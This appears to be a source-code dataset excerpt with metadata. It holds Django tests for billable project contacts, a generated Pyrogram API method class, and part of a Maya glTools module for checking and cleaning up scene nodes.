def test_only_one_contact_can_be_billable(self):
self.pc1.is_billable = True
self.pc1.save()
self.assertEqual(
1, self.project.project_contacts.filter(is_billable=True).count()
)
self.assertEqual(
self.pc1, self.project.project_contacts.filter(is_billable=True).get()
)
self.pc2.is_billable = True
self.pc2.save()
self.assertEqual(
1, self.project.project_contacts.filter(is_billable=True).count()
)
self.assertEqual(
self.pc2, self.project.project_contacts.filter(is_billable=True).get()
)
| 35.5
| 85
| 0.65493
|
from django.test import TestCase
from ..company.models import Company
from ..project.models import *
from .models import *
def create_contact_data(self):
self.company = Company.objects.create(schema="test", name="Test")
self.company.activate()
self.project = Project.objects.create(name="my project")
self.contact = Contact.objects.create(first_name="Ludwig", last_name="von Mises")
class ContactProjectTests(TestCase):
def setUp(self):
create_contact_data(self)
def test_no_association(self):
self.assertEquals(0, len(self.contact.projects.all()))
self.assertEquals(0, len(self.contact.project_contacts.all()))
self.assertEquals(0, len(self.project.contacts.all()))
self.assertEquals(0, len(self.project.project_contacts.all()))
def test_customer_association(self):
ProjectContact.objects.create(
project=self.project,
contact=self.contact,
association=ProjectContact.CUSTOMER,
)
self.assertEquals(1, len(self.contact.projects.all()))
self.assertEquals(1, len(self.project.contacts.all()))
pc = ProjectContact.objects.get(project=self.project)
self.assertEquals(ProjectContact.CUSTOMER, pc.association)
class BillableContactTests(TestCase):
def setUp(self):
self.company = Company.objects.create(schema="test", name="Test")
self.company.activate()
self.project = Project.objects.create(name="my project")
self.pc1 = ProjectContact.objects.create(
project=self.project,
contact=Contact.objects.create(first_name="A 1", last_name="B 1"),
)
self.pc2 = ProjectContact.objects.create(
project=self.project,
contact=Contact.objects.create(first_name="A 2", last_name="B 2"),
)
def test_no_billable_set(self):
self.assertEqual(
0, self.project.project_contacts.filter(is_billable=True).count()
)
def test_billable_set(self):
self.pc1.is_billable = True
self.pc1.save()
self.assertEqual(
1, self.project.project_contacts.filter(is_billable=True).count()
)
def test_only_one_contact_can_be_billable(self):
self.pc1.is_billable = True
self.pc1.save()
self.assertEqual(
1, self.project.project_contacts.filter(is_billable=True).count()
)
self.assertEqual(
self.pc1, self.project.project_contacts.filter(is_billable=True).get()
)
self.pc2.is_billable = True
self.pc2.save()
self.assertEqual(
1, self.project.project_contacts.filter(is_billable=True).count()
)
self.assertEqual(
self.pc2, self.project.project_contacts.filter(is_billable=True).get()
)
| true
| true
|
790c876c497a26028208d38a1aa0636aa1e15800
| 2,020
|
py
|
Python
|
venv/Lib/site-packages/pyrogram/raw/functions/messages/get_dialog_unread_marks.py
|
iamgeorgiy/heroku-userbot
|
5a92417d16f8ead949d88cb38da213fc2da5d3a4
|
[
"Apache-2.0"
] | null | null | null |
venv/Lib/site-packages/pyrogram/raw/functions/messages/get_dialog_unread_marks.py
|
iamgeorgiy/heroku-userbot
|
5a92417d16f8ead949d88cb38da213fc2da5d3a4
|
[
"Apache-2.0"
] | null | null | null |
venv/Lib/site-packages/pyrogram/raw/functions/messages/get_dialog_unread_marks.py
|
iamgeorgiy/heroku-userbot
|
5a92417d16f8ead949d88cb38da213fc2da5d3a4
|
[
"Apache-2.0"
] | null | null | null |
# Pyrogram - Telegram MTProto API Client Library for Python
# Copyright (C) 2017-2020 Dan <https://github.com/delivrance>
#
# This file is part of Pyrogram.
#
# Pyrogram is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Pyrogram is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Pyrogram. If not, see <http://www.gnu.org/licenses/>.
from io import BytesIO
from pyrogram.raw.core.primitives import Int, Long, Int128, Int256, Bool, Bytes, String, Double, Vector
from pyrogram.raw.core import TLObject
from pyrogram import raw
from typing import List, Union, Any
# # # # # # # # # # # # # # # # # # # # # # # #
# !!! WARNING !!! #
# This is a generated file! #
# All changes made in this file will be lost! #
# # # # # # # # # # # # # # # # # # # # # # # #
class GetDialogUnreadMarks(TLObject): # type: ignore
"""Telegram API method.
Details:
- Layer: ``117``
- ID: ``0x22e24e22``
**No parameters required.**
Returns:
List of :obj:`DialogPeer <pyrogram.raw.base.DialogPeer>`
"""
__slots__: List[str] = []
ID = 0x22e24e22
QUALNAME = "functions.messages.GetDialogUnreadMarks"
def __init__(self) -> None:
pass
@staticmethod
def read(data: BytesIO, *args: Any) -> "GetDialogUnreadMarks":
# No flags
return GetDialogUnreadMarks()
def write(self) -> bytes:
data = BytesIO()
data.write(Int(self.ID, False))
# No flags
return data.getvalue()
| 30.149254
| 103
| 0.631188
|
from io import BytesIO
from pyrogram.raw.core.primitives import Int, Long, Int128, Int256, Bool, Bytes, String, Double, Vector
from pyrogram.raw.core import TLObject
from pyrogram import raw
from typing import List, Union, Any
| true
| true
|
790c87d6ab5b6406edbaf5b2a2fb86acf561e471
| 24,973
|
py
|
Python
|
utils/cleanup.py
|
fsanges/glTools
|
8ff0899de43784a18bd4543285655e68e28fb5e5
|
[
"MIT"
] | 165
|
2015-01-26T05:22:04.000Z
|
2022-03-22T02:50:41.000Z
|
utils/cleanup.py
|
qeeji/glTools
|
8ff0899de43784a18bd4543285655e68e28fb5e5
|
[
"MIT"
] | 5
|
2015-12-02T02:39:44.000Z
|
2020-12-09T02:45:54.000Z
|
utils/cleanup.py
|
qeeji/glTools
|
8ff0899de43784a18bd4543285655e68e28fb5e5
|
[
"MIT"
] | 83
|
2015-02-10T17:18:24.000Z
|
2022-02-10T07:16:47.000Z
|
import maya.mel as mm
import maya.cmds as mc
import glTools.utils.attribute
import glTools.utils.base
import glTools.utils.layer
import glTools.utils.reference
import glTools.utils.shader
import glTools.utils.shape
import glTools.utils.transform
import re
# ===========
# - Cleanup -
# ===========
def toggleCons(state):
'''
Toggle the display state of all joint buffers ('Con') in the scene
@param state: The display state to set the joint buffers to
@type state: bool
'''
# Get List of Con Joints
conList = mc.ls('*Con*_jnt',type='joint')
for conJnt in conList:
# Toggle State
if state:
glTools.utils.base.displayOverride(conJnt,overrideEnable=1,overrideLOD=0)
mc.setAttr(conJnt+'.drawStyle',0) # Bone
else:
glTools.utils.base.displayOverride(conJnt,overrideEnable=1,overrideLOD=1)
mc.setAttr(conJnt+'.drawStyle',2) # None
# Set Joint Radius
if mc.getAttr(conJnt+'.radius',se=True):
mc.setAttr(conJnt+'.radius',0.0)
mc.setAttr(conJnt+'.radius',cb=False)
# Hide Rotate Order
if mc.getAttr(conJnt+'.ro',se=True):
mc.setAttr(conJnt+'.ro',cb=False)
# Return Result
return conList
def toggleEnds(state):
'''
Toggle the display state of all joint buffers ('Con') in the scene
@param state: The display state to set the joint buffers to
@type state: bool
'''
# Get list of End joints
endList = mc.ls('*End_jnt',type='joint')
for endJnt in endList:
# Toggle state
if state:
glTools.utils.base.displayOverride(endJnt,overrideEnable=1,overrideLOD=0)
mc.setAttr(endJnt+'.drawStyle',0) # Bone
else:
glTools.utils.base.displayOverride(endJnt,overrideEnable=1,overrideLOD=1)
mc.setAttr(endJnt+'.drawStyle',2) # None
# Set Joint Radius
if mc.getAttr(endJnt+'.radius',se=True):
mc.setAttr(endJnt+'.radius',0.0)
mc.setAttr(endJnt+'.radius',cb=False)
# Hide Rotate Order
if mc.getAttr(endJnt+'.ro',se=True):
mc.setAttr(endJnt+'.ro',cb=False)
# Return Result
return endList
def disableDrawingOverrides(grp):
'''
Disable drawing overrides for all DAG descendents of the specified transform node.
@param state: The transform under which all descendent node drawing overrides will be disabled.
@type state: bool
'''
# ==========
# - Checks -
# ==========
if not mc.objExists(grp):
raise Exception('Transform "'+grp+'" does not exists!')
if not glTools.utils.transform.isTransform(grp):
raise Exception('Object "'+grp+'" is not a valid transform!')
# Get Descendent Node List
nodeList = mc.ls(mc.listRelatives(grp,ad=True, pa=True) or [],dag=True) or []
if not nodeList: return []
# =============================
# - Disable Drawing Overrides -
# =============================
overrideName = 'overrideEnabled'
for node in nodeList:
# Check Override Attribute
overrideAttr = node+'.'+overrideName
if not mc.attributeQuery(overrideName,n=node,ex=True):
print('Override attribute "'+overrideAttr+'" does not exist! Skipping...')
continue
# Check Override Attribute Connections
overrideConn = mc.listConnections(overrideAttr,s=True,d=False) or []
if overrideConn:
print('Found incoming connection for override attribute "'+overrideAttr+'"! ('+overrideConn[0]+')')
print('Disconnecting attribute and disabling drawing overrides...')
mc.disconnectAttr(overrideConn[0],overrideAttr)
# Disable Drawing Overrides
try: mc.setAttr(overrideAttr,0)
except: pass
# =================
# - Return Result -
# =================
return nodeList
# ==========
# - Checks -
# ==========
def uniqueNameCheck(objList=[],transformsOnly=False):
'''
Return a list of nodes with non unique names
@param objList: List of scene objects to check. If empty, use all existing scene nodes.
@type objList: list
@param transformsOnly: Check transform names only
@type transformsOnly: bool
'''
# Get list of scene nodes
if not objList:
objList = mc.ls()
if transformsOnly:
nodeList = mc.ls(objList,transforms=True)
else:
nodeList = mc.ls(objList,dag=True)
# Determine non unique names
nonUniqueList = [i for i in nodeList if i.count('|')]
# Return result
return nonUniqueList
def validNameCheck(objList=[]):
'''
Check for valid names in the specified list of nodes
@param objList: List of objects to check valid names for. If empty use all scene transforms
@type objList: list
'''
# Check geo list
if not objList: objList = mc.ls()
if not objList: return []
# Remove Default Nodes
defNodes = ['dof1','time1','lambert1','postProcessList1','sequenceManager1','lightLinker1','renderGlobalsList1','dynController1','lightList1','particleCloud1','shaderGlow1']
objList = [obj for obj in objList if not defNodes.count(obj)]
objList = [obj for obj in objList if not obj.startswith('default')]
objList = [obj for obj in objList if not mc.nodeType(obj) == 'objectTypeFilter']
objList = [obj for obj in objList if not mc.nodeType(obj) == 'objectNameFilter']
objList = [obj for obj in objList if not mc.nodeType(obj) == 'objectScriptFilter']
# Check valid names
result = []
for obj in objList:
# Check prefix
#if not obj.startswith('cn_') and not obj.startswith('lf_') and not obj.startswith('rt_'):
# result.append(obj)
# Check "pasted"
if obj.count('pasted'): result.append(obj)
# Check "poly"
if obj.count('poly'): result.append(obj)
# Check double underscore "__"
if obj.count('__'): result.append(obj)
# Check names ending with a digit (0-9)
digitSearch = re.search('(\d+)$', obj)
if digitSearch and glTools.utils.transform.isTransform(obj):
if digitSearch.group(0):
result.append(obj)
# Remove Duplicate Entries
result = list(set(result))
# Return result
return result
def shapeNameCheck( objList = [],
typeList = ['mesh','nurbsCurve','nurbsSurface'],
skipIntermediates = True,
skipMultipleShapes = False,
strict = True ):
'''
Return a list of incorrectly named geometry shape nodes.
@param objList: List of objects to check for valid shape names. If empty, get all nodes of the specified type.
@type objList: list
@param typeList: List of shape types to check for valid names.
@type typeList: list
@param skipIntermediates: Skip intermediate shapes.
@type skipIntermediates: bool
@param skipMultipleShapes: Skip objects with multiple shape nodes.
@type skipMultipleShapes: bool
@param strict: Shape name must match parent+"Shape" to pass.
@type strict: bool
'''
# ==========
# - Checks -
# ==========
if not objList: objList = mc.ls(type=typeList)
# ====================
# - Build Shape List -
# ====================
shapeList = []
for obj in objList:
# Get Shapes from Transform
if glTools.utils.transform.isTransform(obj):
# Check Multiple Shapes
objShapes = mc.listRelatives(obj,s=True,pa=True)
if not objShapes: continue
if (len(objShapes) > 1) and skipMultipleShapes: continue
# Get Shapes
tShapeList = mc.listRelatives(obj,s=True,ni=skipIntermediates,pa=True)
for shape in tShapeList:
shapeList.append(obj)
elif glTools.utils.shape.isShape(obj):
shapeList.append(obj)
else:
print('Unable to determine shape from object "'+obj+'"! Skipping...')
# =====================
# - Check Shape Names -
# =====================
invalidShapeNameList = []
for shape in shapeList:
# Check Type
if not typeList.count(mc.objectType(shape)): continue
# Check Intermediate Object
if skipIntermediates and mc.getAttr(shape+'.intermediateObject'): continue
# Get transform parent name
parent = mc.listRelatives(shape,p=True,pa=True)[0]
# Get Short Names
shapeSN = mc.ls(shape,sn=True)[0]
parentSN = mc.ls(parent,sn=True)[0]
# Check Shape Name
if strict and (shape != parent+'Shape'):
invalidShapeNameList.append(shape)
if not shapeSN.startswith(parentSN):
invalidShapeNameList.append(shape)
elif not shapeSN.count('Shape'):
invalidShapeNameList.append(shape)
# =================
# - Return Result -
# =================
return invalidShapeNameList
def intermediateShapesCheck(objList=[]):
'''
Return a list of intermediate shapes.
@param objList: List of objects to check for intermediate shapes.
@type objList: list
'''
# Check nodeList
if not objList: objList = mc.ls(transforms=True)
else: objList = mc.ls(objList,transforms=True)
# For each node
result = []
for obj in objList:
# Get All Shapes
shapes = mc.listRelatives(obj,s=True,pa=True)
if not shapes: shapes = []
for shape in shapes:
# Check Intermediate Shapes
if mc.objExists(shape+'.intermediateObject'):
if mc.getAttr(shape+'.intermediateObject'):
result.append(shape)
# Return Result
return result
def multipleShapeCheck(objList=[]):
'''
Return a list of transforms with multiple shape nodes
@param objList: List of objects to check for multiple shapes.
@type objList: list
'''
# Get scene transforms
if not objList: objList = mc.ls(transforms=True)
else: objList = mc.ls(objList,dag=True)
# Iterate over scene transforms
result = []
for transform in objList:
# Check Transform
if not glTools.utils.transform.isTransform(transform):
transform = mc.listRelatives(transform,p=True)[0]
# Get transform shape list
shapeList = mc.listRelatives(transform,s=True)
# Check shape list
if not shapeList: continue
shapeList = mc.ls(shapeList,type=['mesh','nurbsSurface','nurbsCurve'])
# Check number of shapes
if len(shapeList) > 1: result.append(transform)
# Return result
return result
def constructionHistoryCheck(geoList=[]):
'''
Return a list of nodes that contain construction history
@param objList: List of objects to check for construction history.
@type objList: list
'''
# Get Scene Geometry
if not geoList:
geoList = mc.ls(geometry=True)
else:
geoList = mc.listRelatives(geoList,s=True,pa=True)
# For each node
result = []
for geo in geoList:
# Check Construction History
hist = mc.listHistory(geo)
# Remove Self
if hist.count(geo): hist.remove(geo)
# Ignore Node Types
ignore = mc.ls(hist,type=['groupId','shadingEngine','transform'])
hist = list(set(hist)-set(ignore))
# Check History
if hist:
obj = mc.listRelatives(geo,p=True,pa=True)
result.extend(obj)
# Remove Duplicate Names
if result: result = list(set(result))
# Return Result
return result
def userAttrCheck(objList=[],includeShapes=False):
'''
Return a list of user defined attributes for a specified list of nodes (and shapes).
@param objList: List of objects to check for user defined attributes.
@type objList: list
@param includeShapes: Also check shapes for user defined attributes.
@type includeShapes: bool
'''
# Initialize Return List
result = []
# Check objList
if not objList: objList = mc.ls()
# For each node
for obj in objList:
userAttrs = mc.listAttr(obj,ud=True)
if not userAttrs: userAttrs = []
for attr in userAttrs:
result.append(obj+'.'+attr)
# Check Shapes
if includeShapes:
shapes = mc.listRelatives(obj,s=True)
if not shapes: shapes = []
for shape in shapes:
userAttrs = mc.listAttr(shape,ud=True)
if not userAttrs: userAttrs = []
for attr in userAttrs:
result.append(shape+'.'+attr)
# Return Result
return result
def emptyGroupCheck(objList=[]):
'''
List empty groups.
@param objList: List of transforms to check.
@type objList: list
'''
# Check objList
if not objList: objList = mc.ls(transforms=True)
else: objList = mc.ls(objList,transforms=True)
# Find Empty Groups
result = []
for grp in objList:
if not mc.listRelatives(grp,ad=True):
result.append(grp)
# Return Result
return result
def emptySetCheck(setList=[]):
'''
Return a list of empty sets
@param setList: List of sets to check.
@type setList: list
'''
# Check setList
if not setList: setList = mc.ls(sets=True)
# Check empty sets
result = []
for setName in setList:
# Check Set
if not mc.ls(setName,sets=True): continue
# Skip Default Sets
if setName.startswith('default'): continue
if setName.startswith('initial'): continue
# Check Set
if not mc.sets(setName,q=True):
result.append(setName)
# Return result
return result
def emptyLayerCheck(layerList=[]):
'''
Return a list if empty layers
@param layerList: List of layers to check. If empty, use all existing layers in current scene.
@type layerList: list
'''
# Check Layer List
if not layerList: layerList = mc.ls(type=['displayLayer','renderLayer','animLayer'])
else: layerList = mc.ls(layerList,type=['displayLayer','renderLayer','animLayer'])
# Check Empty Layers
result = []
for layer in layerList:
# Check Layer
if not mc.ls(layer,type=['displayLayer','renderLayer','animLayer']): continue
# Skip Default Layers
if layer.startswith('default'): continue
# Check Membership
if not glTools.utils.layer.memberList(layer):
result.append(layer)
# Return Result
return result
def animCurveCheck(curveTypeList=['animCurveTL','animCurveTA','animCurveTT','animCurveTU','animCurveUL','animCurveUA','animCurveUT','animCurveUU']):
'''
Return a list of all existing animCurves of a specified type.
@param curveList: List of animCurve types to consider.
@type curveList: list
@param curveTypeList: List of animCurve types to consider.
@type curveTypeList: list
'''
# Initialize Return List
animCurves = []
# List AnimCurve Nodes
for curveType in curveTypeList:
curveList = mc.ls(type=curveType)
if curveList:
animCurves.extend(curveList)
# Return Result
return animCurves
def unusedShadingNodeCheck():
'''
Return a list of unused shading nodes.
'''
return glTools.utils.shader.listUnusedShadingNodes()
def noGeometryShaderCheck(geoList=[]):
'''
Return a list of non intermediate geometry shapes with no shader assignment.
@param geoList: List of geometry to check for shader assignments.
@type geoList: list
'''
# Check Geometry List
if not geoList:
geoList = mc.ls(type=['mesh','nurbsSurface'],ni=True)
else:
geoList += mc.ls(mc.listRelatives(geoList,ad=True,pa=True) or [],type=['mesh','nurbsSurface'],ni=True) or []
geoList = mc.ls(geoList,type=['mesh','nurbsSurface'],ni=True)
# Check Shader Assignment
noShaderList = []
for geo in geoList:
SG = glTools.utils.shader.getSG(geo)
if not SG: noShaderList.append(geo)
# Return Result
return noShaderList
def unusedReferenceCheck():
'''
Return a list of unused reference nodes.
'''
# Initialize Return List
result = []
# Get list of existing references
refList = glTools.utils.reference.listReferences()
# Check Unused Reference
for ref in refList:
try: refFile = glTools.utils.reference.getReferenceFile(ref)
except: result.append(ref)
# Return Result
return result
def unknownNodeCheck():
'''
Return a list of unknown nodes.
'''
result = mc.ls(type='unknown')
if not result: result = []
return result
def checkTransforms(objList=[],tol=0.0000000001):
'''
Check for non-zero transforms
@param objList: List of transforms to check.
@type objList: list
@param tol: Value tolerance.
@type tol: float
'''
# Check Object List
if not objList: objList = mc.ls(transforms=True)
if not objList: return []
# Check Transforms
transformList = []
for obj in objList:
# Skip Default Transforms
if obj == 'persp': continue
if obj == 'front': continue
if obj == 'side': continue
if obj == 'top': continue
# Translate
if abs(mc.getAttr(obj+'.tx')) > tol:
transformList.append(obj)
continue
if abs(mc.getAttr(obj+'.ty')) > tol:
transformList.append(obj)
continue
if abs(mc.getAttr(obj+'.tz')) > tol:
transformList.append(obj)
continue
# Rotate
if abs(mc.getAttr(obj+'.rx')) > tol:
transformList.append(obj)
continue
if abs(mc.getAttr(obj+'.ry')) > tol:
transformList.append(obj)
continue
if abs(mc.getAttr(obj+'.rz')) > tol:
transformList.append(obj)
continue
# Scale
if abs(mc.getAttr(obj+'.sx') - 1.0) > tol:
transformList.append(obj)
continue
if abs(mc.getAttr(obj+'.sy') - 1.0) > tol:
transformList.append(obj)
continue
if abs(mc.getAttr(obj+'.sz') - 1.0) > tol:
transformList.append(obj)
continue
# Return Result
return transformList
def displayOverridesCheck(objList=[]):
'''
Check all/specified objects for display overrides
@param objList: List of DAG nodes to check. If empty, use all DAG nodes in scene
@type objList: list
'''
# Check Object List
if not objList: objList = mc.ls(dag=True)
else: objList = mc.ls(objList,dag=True)
# Check Display Overrides
displayOverrideList = []
for obj in objList:
if mc.getAttr(obj+'.overrideEnabled'):
displayOverrideList.append(obj)
# Return Result
return displayOverrideList
# =========
# - Fixes -
# =========
def shapeNameFix(shape):
'''
Fix incorrectly named geometry shape node
@param objList: List of objects to check for valid shape names.
@type objList: list
@param typeList: List of shape types to check for valid names.
@type typeList: list
@param skipIntermediates: Skip intermediate shapes
@type skipIntermediates: bool
'''
# Get Shape Transform Parent
parent = mc.listRelatives(shape,p=True)[0]
# Check Shape Name
shapeName = parent+'Shape'
if mc.objExists(shapeName):
raise Exception('Shape "'+shapeName+'" already exists! Unable to rename shape "'+shape+'"!')
# Rename Shape
newShape = mc.rename(shape,shapeName)
# Return Result
return newShape
def deleteIntermediateShapes(objList=[]):
'''
Delete all intermediate shapes in the scene
'''
# Get list of intermediate shapes
intermediateShapeList = intermediateShapesCheck(objList)
# Delete intermediate shapes
if intermediateShapeList: mc.delete(intermediateShapeList)
# Return result
return intermediateShapeList
def deleteConstructionHistory(geoList=[]):
'''
Delete construction history for specified geometry
@param geoList: List of objects to delete for construction history from.
@type geoList: list
'''
# Get Scene Geometry
if not geoList: geoList = mc.ls(geometry=True)
# Delete History
for geo in geoList: mc.delete(geo,ch=True)
# Return Result
return geoList
def deleteUserAttrs(nodeList=[],includeShapes=False):
'''
Delete user defined attributes from the specified list of nodes
@param nodeList: List of nodes to delete user defined attrs from. If empty, assume all nodes.
@type nodeList: list
@param includeShapes: Delete user attributes
@type includeShapes: bool
'''
# Check nodeList
if not nodeList: nodeList = mc.ls()
# For each node
for node in nodeList:
# Delete user attributes
glTools.utils.attribute.deleteUserAttrs(node)
# Include Shapes
if includeShapes:
# Delete shape user attributes
shapes = mc.listRelatives(node,s=True)
for shape in shapes:
glTools.utils.attribute.deleteUserAttrs(shape)
def deleteEmptyGroups(objList=[]):
'''
Delete empty groups
'''
# Get Empty Group List
emptyGrpList = emptyGroupCheck(objList=objList)
# Delete Empty Groups
if emptyGrpList: mc.delete(emptyGrpList)
# Return Result
return emptyGrpList
def deleteEmptySets(setList=[]):
'''
Delete empty groups
'''
# Get Empty Group List
emptySetList = emptySetCheck(setList=setList)
# Delete Empty Groups
if emptySetList: mc.delete(emptySetList)
# Return Result
return emptySetList
def deleteEmptyLayers(layerList=[]):
'''
Delete empty groups
'''
# Get Empty Group List
emptyLayerList = emptyLayerCheck(layerList=layerList)
# Delete Empty Groups
if emptyLayerList: mc.delete(emptyLayerList)
# Return Result
return emptyLayerList
def deleteUnknownNodes():
'''
Delete all node of type "unknown" in the scene
'''
# Get list of unknown nodes
unknownNodes = unknownNodeCheck() or []
# Delete unknown nodes
for node in unknownNodes:
try:
mc.lockNode(node,l=False)
mc.delete(node)
except:
print('Problem deleting unknown node "'+node+'"!')
# Return Result
return unknownNodes
def deleteNodesByType(nodeTypeList=[]):
'''
Delete nodes of the specified type(s).
@param nodeTypeList: List of node types to delete.
@type nodeTypeList: list
'''
# Check Node Types
if not nodeTypeList: return []
# Get Node List (by type)
nodeList = mc.ls(type=nodeTypeList)
# Delete Nodes
if nodeList: mc.delete(nodeList)
else: nodeList = []
# Return Result
return nodeList
def deleteUnusedReferenceNodes():
'''
Delete all unused reference nodes in the scene
'''
mm.eval('RNdeleteUnused')
def deleteEmptySets(setList=[]):
'''
Delete empty object sets
@param setList: A list of sets to check. If empty, chack all sets in current scene.
@type setList: list
'''
# Check setList
if not setList: setList = mc.ls(sets=True)
# Check empty sets
emptySetList = []
for set in setList:
if not mc.sets(set,q=True):
emptySetList.append(set)
# Delete empty sets
for emptySet in emptySetList:
try: mc.delete(emptySet)
except: pass
# Return result
return emptySetList
def deleteAllSets(excludeList=[]):
'''
Delete unused object sets
@param excludeList: A list of sets to exclude from the list of unused sets.
@type excludeList: list
'''
# Get set list
setList = mc.ls(sets=True)
if excludeList:
excludeSetList = mc.ls(excludeList,sets=True)
setList = list(set(setList)-set(excludeSetList))
# Delete unused sets
for deleteSet in setList:
try: mc.delete(deleteSet)
except: pass
# Return result
return setList
def deleteUnusedShadingNodes():
'''
Delete all unused shading nodes in the scene
'''
#texList = mc.ls(tex=True)
#if texList: mc.delete(texList)
mm.eval('MLdeleteUnused')
def deleteDisplayLayers():
'''
Delete all display layers
'''
# Get display layer list
displayLayers = mc.ls(type='displayLayer')
displayLayers.remove('defaultLayer')
# Delete display layers
if displayLayers: mc.delete(displayLayers)
# Return result
return displayLayers
def deleteRenderLayers():
'''
Delete all render layers
'''
# Get render layer list
renderLayers = mc.ls(type='renderLayer')
renderLayers.remove('defaultRenderLayer')
# Delete render layers
if renderLayers: mc.delete(renderLayers)
# Return result
return renderLayers
def assignInitialShadingGroup(geoList=[]):
'''
Assign initialShadingGroup (lambert1) to specified geometry.
@param geoList: List of geometry to apply default shader to. If empty, use all scene geometry
@type geoList: list
'''
# Check geoList
if not geoList: geoList = mc.ls(geometry=True)
if not geoList: return []
# Assign Initial Shading Group
mc.sets(geoList,fe='initialShadingGroup')
# Return result
return geoList
def zeroTransforms(objList=[]):
'''
Reset transform values
@param objList: List of transforms to zero out.
@type objList: list
'''
# Check Object List
if not objList: objList = mc.ls(transforms=True)
if not objList: return []
# Check Transforms
for obj in objList:
# Translate
if mc.getAttr(obj+'.tx',se=True): mc.setAttr(obj+'.tx',0)
if mc.getAttr(obj+'.ty',se=True): mc.setAttr(obj+'.ty',0)
if mc.getAttr(obj+'.tz',se=True): mc.setAttr(obj+'.tz',0)
# Rotate
if mc.getAttr(obj+'.rx',se=True): mc.setAttr(obj+'.rx',0)
if mc.getAttr(obj+'.ry',se=True): mc.setAttr(obj+'.ry',0)
if mc.getAttr(obj+'.rz',se=True): mc.setAttr(obj+'.rz',0)
# Scale
if mc.getAttr(obj+'.sx',se=True): mc.setAttr(obj+'.sx',0)
if mc.getAttr(obj+'.sy',se=True): mc.setAttr(obj+'.sy',0)
if mc.getAttr(obj+'.sz',se=True): mc.setAttr(obj+'.sz',0)
# Return Result
return objList
def copyInputShapeAttrs(geoList=[]):
'''
Copy user defined attributes from an input shape to the output deforming shape.
@param geoList: List of geometry to copy atributes for.
@type geoList: list
'''
# Check Geometry List
if not geoList: geoList = mc.listRelatives(mc.ls(geometry=True) or [],p=True,pa=True) or []
if not geoList: return []
# Copy Input Shape Attrs
for geo in geoList:
# Get Output Shape
geoShape = mc.listRelatives(geo,s=True,ni=True) or []
if not geoShape:
print('No shape found for geometry transform "'+geo+'"!')
continue
# Get Input Shape
geoInputShape = geoShape[0]
try: geoInputShape = glTools.utils.shape.findInputShape(geoShape[0])
except: pass
# Copy User Attributes
if geoInputShape != geoShape[0]:
userAttr = mc.listAttr(geoInputShape,ud=True,s=True) or []
for at in userAttr: glTools.utils.attribute.copyAttr(geoInputShape,geoShape[0],at)
# ========
# - MISC -
# ========
def removeTurtle():
'''
Delete nodes and unload plgin related to the Turtle Renderer.
'''
# Remove Turtle Nodes
turtleNode = 'TurtleDefaultBakeLayer'
if mc.objExists(turtleNode):
print('Removing Turtle nodes...')
mc.lockNode(turtleNode,l=False)
mc.delete(turtleNode)
# Unload Plugin
if mc.pluginInfo('Turtle',q=True,loaded=True):
print('Unloading Turtle plugin...')
try: mc.unloadPlugin('Turtle',f=True)
except: print('Error unloading Turtle plugin!')
| 25.851967
| 174
| 0.699916
|
import maya.mel as mm
import maya.cmds as mc
import glTools.utils.attribute
import glTools.utils.base
import glTools.utils.layer
import glTools.utils.reference
import glTools.utils.shader
import glTools.utils.shape
import glTools.utils.transform
import re
def toggleCons(state):
conList = mc.ls('*Con*_jnt',type='joint')
for conJnt in conList:
if state:
glTools.utils.base.displayOverride(conJnt,overrideEnable=1,overrideLOD=0)
mc.setAttr(conJnt+'.drawStyle',0)
else:
glTools.utils.base.displayOverride(conJnt,overrideEnable=1,overrideLOD=1)
mc.setAttr(conJnt+'.drawStyle',2)
if mc.getAttr(conJnt+'.radius',se=True):
mc.setAttr(conJnt+'.radius',0.0)
mc.setAttr(conJnt+'.radius',cb=False)
if mc.getAttr(conJnt+'.ro',se=True):
mc.setAttr(conJnt+'.ro',cb=False)
return conList
def toggleEnds(state):
endList = mc.ls('*End_jnt',type='joint')
for endJnt in endList:
if state:
glTools.utils.base.displayOverride(endJnt,overrideEnable=1,overrideLOD=0)
mc.setAttr(endJnt+'.drawStyle',0)
else:
glTools.utils.base.displayOverride(endJnt,overrideEnable=1,overrideLOD=1)
mc.setAttr(endJnt+'.drawStyle',2)
if mc.getAttr(endJnt+'.radius',se=True):
mc.setAttr(endJnt+'.radius',0.0)
mc.setAttr(endJnt+'.radius',cb=False)
if mc.getAttr(endJnt+'.ro',se=True):
mc.setAttr(endJnt+'.ro',cb=False)
return endList
def disableDrawingOverrides(grp):
if not mc.objExists(grp):
raise Exception('Transform "'+grp+'" does not exists!')
if not glTools.utils.transform.isTransform(grp):
raise Exception('Object "'+grp+'" is not a valid transform!')
nodeList = mc.ls(mc.listRelatives(grp,ad=True, pa=True) or [],dag=True) or []
if not nodeList: return []
overrideName = 'overrideEnabled'
for node in nodeList:
overrideAttr = node+'.'+overrideName
if not mc.attributeQuery(overrideName,n=node,ex=True):
print('Override attribute "'+overrideAttr+'" does not exist! Skipping...')
continue
overrideConn = mc.listConnections(overrideAttr,s=True,d=False) or []
if overrideConn:
print('Found incoming connection for override attribute "'+overrideAttr+'"! ('+overrideConn[0]+')')
print('Disconnecting attribute and disabling drawing overrides...')
mc.disconnectAttr(overrideConn[0],overrideAttr)
try: mc.setAttr(overrideAttr,0)
except: pass
return nodeList
def uniqueNameCheck(objList=[],transformsOnly=False):
if not objList:
objList = mc.ls()
if transformsOnly:
nodeList = mc.ls(objList,transforms=True)
else:
nodeList = mc.ls(objList,dag=True)
nonUniqueList = [i for i in nodeList if i.count('|')]
return nonUniqueList
def validNameCheck(objList=[]):
if not objList: objList = mc.ls()
if not objList: return []
defNodes = ['dof1','time1','lambert1','postProcessList1','sequenceManager1','lightLinker1','renderGlobalsList1','dynController1','lightList1','particleCloud1','shaderGlow1']
objList = [obj for obj in objList if not defNodes.count(obj)]
objList = [obj for obj in objList if not obj.startswith('default')]
objList = [obj for obj in objList if not mc.nodeType(obj) == 'objectTypeFilter']
objList = [obj for obj in objList if not mc.nodeType(obj) == 'objectNameFilter']
objList = [obj for obj in objList if not mc.nodeType(obj) == 'objectScriptFilter']
result = []
for obj in objList:
if obj.count('pasted'): result.append(obj)
if obj.count('poly'): result.append(obj)
if obj.count('__'): result.append(obj)
digitSearch = re.search('(\d+)$', obj)
if digitSearch and glTools.utils.transform.isTransform(obj):
if digitSearch.group(0):
result.append(obj)
